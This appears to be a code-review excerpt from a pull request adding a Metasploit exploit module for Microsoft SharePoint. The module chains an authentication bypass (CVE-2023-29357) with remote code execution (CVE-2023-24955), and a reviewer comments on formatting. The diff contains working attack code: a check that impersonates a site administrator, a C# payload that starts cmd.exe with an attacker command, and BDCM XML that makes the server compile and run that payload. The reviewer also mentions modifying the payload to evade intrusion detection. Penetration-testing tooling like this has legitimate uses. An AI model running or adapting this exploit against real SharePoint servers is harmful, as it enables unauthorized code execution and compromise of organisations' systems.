modules/exploits/windows/http/sharepoint_dynamic_proxy_generator_auth_bypass_rce.rb

```diff
@@ -0,0 +1,372 @@
+
+      @user = current_user.split('|')[1]
+    else
+      return CheckCode::Safe('Unable to identify the current user')
+    end
+
+    if current_user.include?('true</d:IsSiteAdmin>')
+      print_status("Successfully impersonated Site Admin: #{@user}")
+      CheckCode::Vulnerable('Authentication was successfully bypassed via CVE-2023-29357 indicating this target is vulnerable to RCE via CVE-2023-24955.')
+    else
+      CheckCode::Safe('The user found is not a site admin.')
+    end
+  end
+
+  def create_c_sharp_payload(cmd)
+    c_sharp_payload = <<~EOF
+      aaab{
+      class ABCD: System.Web.Services.Protocols.HttpWebClientProtocol{
+      static ABCD(){
+      System.Diagnostics.Process.Start("cmd.exe", "/c #{cmd.gsub!('\\', '\\\\\\')}");
+      }
+      }
+      }
+      namespace aabcd
+    EOF
+
+    c_sharp_payload
+  end
+
+  def drop_and_execute_payload
+    bdcm_data = "<?xml version=\"1.0\" encoding=\"utf-8\"?><Model xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" Name=\"BDCMetadata\" xmlns=\"http://schemas.microsoft.com/windows/2007/BusinessDataCatalog\"><LobSystems><LobSystem Name=\"#{@lob_id}\" Type=\"WebService\"><Properties><Property Name=\"WsdlFetchUrl\" Type=\"System.String\">http://localhost:32843/SecurityTokenServiceApplication/securitytoken.svc?singleWsdl</Property><Property Name=\"WebServiceProxyNamespace\" Type=\"System.String\"><![CDATA[#{create_c_sharp_payload(payload.encoded)}]]></Property><Property Name=\"WsdlFetchAuthenticationMode\" Type=\"System.String\">RevertToSelf</Property></Properties><LobSystemInstances><LobSystemInstance Name=\"#{@lob_id}\"></LobSystemInstance></LobSystemInstances><Entities><Entity Name=\"Products\" DefaultDisplayName=\"Products\" Namespace=\"ODataDemo\" Version=\"1.0.0.0\" EstimatedInstanceCount=\"2000\"><Properties><Property Name=\"ExcludeFromOfflineClientForList\" Type=\"System.String\">False</Property></Properties><Identifiers><Identifier Name=\"ID\" TypeName=\"System.Int32\" /></Identifiers><Methods><Method Name=\"ToString\" DefaultDisplayName=\"Create Product\" IsStatic=\"false\"><Parameters><Parameter Name=\"@ID\" Direction=\"In\"><TypeDescriptor Name=\"ID\" DefaultDisplayName=\"ID\" TypeName=\"System.String\" IdentifierName=\"ID\" CreatorField=\"true\" /></Parameter><Parameter Name=\"@CreateProduct\" Direction=\"Return\"><TypeDescriptor Name=\"CreateProduct\" TypeName=\"System.Object\"></TypeDescriptor></Parameter></Parameters><MethodInstances><MethodInstance Name=\"CreateProduct\" Type=\"GenericInvoker\" ReturnParameterName=\"@CreateProduct\"><AccessControlList><AccessControlEntry Principal=\"STS|SecurityTokenService|http://sharepoint.microsoft.com/claims/2009/08/isauthenticated|true|http://www.w3.org/2001/XMLSchema#string\"><Right BdcRight=\"Execute\" /></AccessControlEntry></AccessControlList></MethodInstance></MethodInstances></Method></Methods></Entity></Entities></LobSystem></LobSystems></Model>"
```

Comment:
I'd recommend properly indenting the XML for readability/maintainability's sake (some people might want to patch/modify it to evade IDS), and use rexml to minify it with something like this:

```
output = ""
formatter = REXML::Formatters::Pretty.new(:indentation=-1)
formatter.compact = true
formatter.write(bdcm_data, output)
```